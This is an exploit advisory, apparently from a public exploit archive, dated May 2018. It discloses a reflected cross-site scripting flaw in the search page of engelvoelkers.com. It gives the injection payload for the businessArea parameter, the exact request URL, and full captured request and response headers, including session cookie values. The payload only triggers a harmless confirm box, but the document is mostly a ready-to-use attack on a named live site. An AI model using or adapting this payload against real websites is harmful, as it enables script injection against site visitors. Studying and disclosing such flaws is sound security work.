Engel Voelkers Cross Site Scripting

www.engelvoelkers.com suffers from a cross site scripting vulnerability.


MD5 | c6735ebd3b2429471544656ab00806de

# Exploit Title: [ Reflected XSS at Engel Voelkers ]

# Date: [27.05.2018]

# Exploit Author: [Ismail Tasdelen]

# Vendor Homepage: [https://www.engelvoelkers.com/]

# Software Link: [ Engel Voelkers Website ]

# Version: 1.0

# Tested on: Kali Linux

# Reflected XSS Payload : residential'-confirm(/Ismail Tasdelen/)-'

# HTTP REQUEST HEADER :

Request URL: https://www.engelvoelkers.com/en/search/?businessArea=residential%27-confirm%28%2FIsmail%20Tasdelen%2F%29-%27&srch=search-text&q=&facets=cntry%3A%3B
Request Method: GET
Status Code: 200
Remote Address: 130.211.26.108:443
Referrer Policy: no-referrer-when-downgrade
:authority: www.engelvoelkers.com
:method: GET
:path: /en/search/?businessArea=residential%27-confirm%28%2FIsmail%20Tasdelen%2F%29-%27&srch=search-text&q=&facets=cntry%3A%3B
:scheme: https
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
accept-encoding: gzip, deflate, br
accept-language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
cache-control: max-age=0
cookie: nbu=4b33b1ea-61d0-11e8-96d5-42010a103302; signature=4da87ca2e51b5650fefa58627a5b8e70a10bf0425369cef6cb90534ea2c768be; verify=NGIzM2IxZWEtNjFkMC0xMWU4LTk2ZDUtNDIwMTBhMTAzMzAyOyUyZmVuJTJmc2VhcmNoJTJmJTNmYnVzaW5lc3NBcmVhJTNkcmVzaWRlbnRpYWwlMjUyNy1jb25maXJtJTI1MjglMjUyRklzbWFpbCUyNTIwVGFzZGVsZW4lMjUyRiUyNTI5LSUyNTI3JTI2c3JjaCUzZHNlYXJjaC10ZXh0JTI2cSUzZCUyNmZhY2V0cyUzZGNudHJ5JTI1M0ElMjUzQjtTdW4sIDI3IE1heSAyMDE4IDE3OjA2OjI3IEdNVA==; _ga=GA1.2.744261947.1527435138; _gid=GA1.2.959267156.1527435138; nbu=06e7d858-dec2-4d6f-ad04-b67e05551ffd; engelundvoelkersconfig=TRY-sqm.m-false-TR-tr; _icl_current_language=en; evlocale=en_TR; BIGipServergroup-rz-webfe-prod=235738028.20480.0000; _gat_ev_com=1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36

# HTTP RESPONSE HEADER :

accept-ranges: bytes
age: 0
alt-svc: clear
cache-control: max-age=0, proxy-revalidate, no-cache, no-store, must-revalidate, private
content-encoding: gzip
content-language: en-TR
content-type: text/html;charset=utf-8
date: Sun, 27 May 2018 17:07:33 GMT
ev-revision: ce7e759467f9281d7107826ce514d214b3f4cb0a
ev-version: P-12.4.1-FRONTEND
expires: 0
expires: Tue, 01 Jan 1980 1:00:00 GMT
pragma: no-cache
server: Apache
set-cookie: engelundvoelkersconfig=TRY-sqm.m-false-TR-tr; Path=/
set-cookie: _icl_current_language=en; Path=/
set-cookie: evlocale=en_TR; Path=/
set-cookie: evlocale=en_TR; Path=/
status: 200
vary: X-MCS-LB-Info-S,Accept-Encoding
via: 1.1 google

# Query String Parametres :

businessArea: residential'-confirm(/Ismail Tasdelen/)-'
srch: search-text
q:
facets: cntry:;

# You want to follow my activity ?

https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://twitter.com/ismailtsdln

Related Posts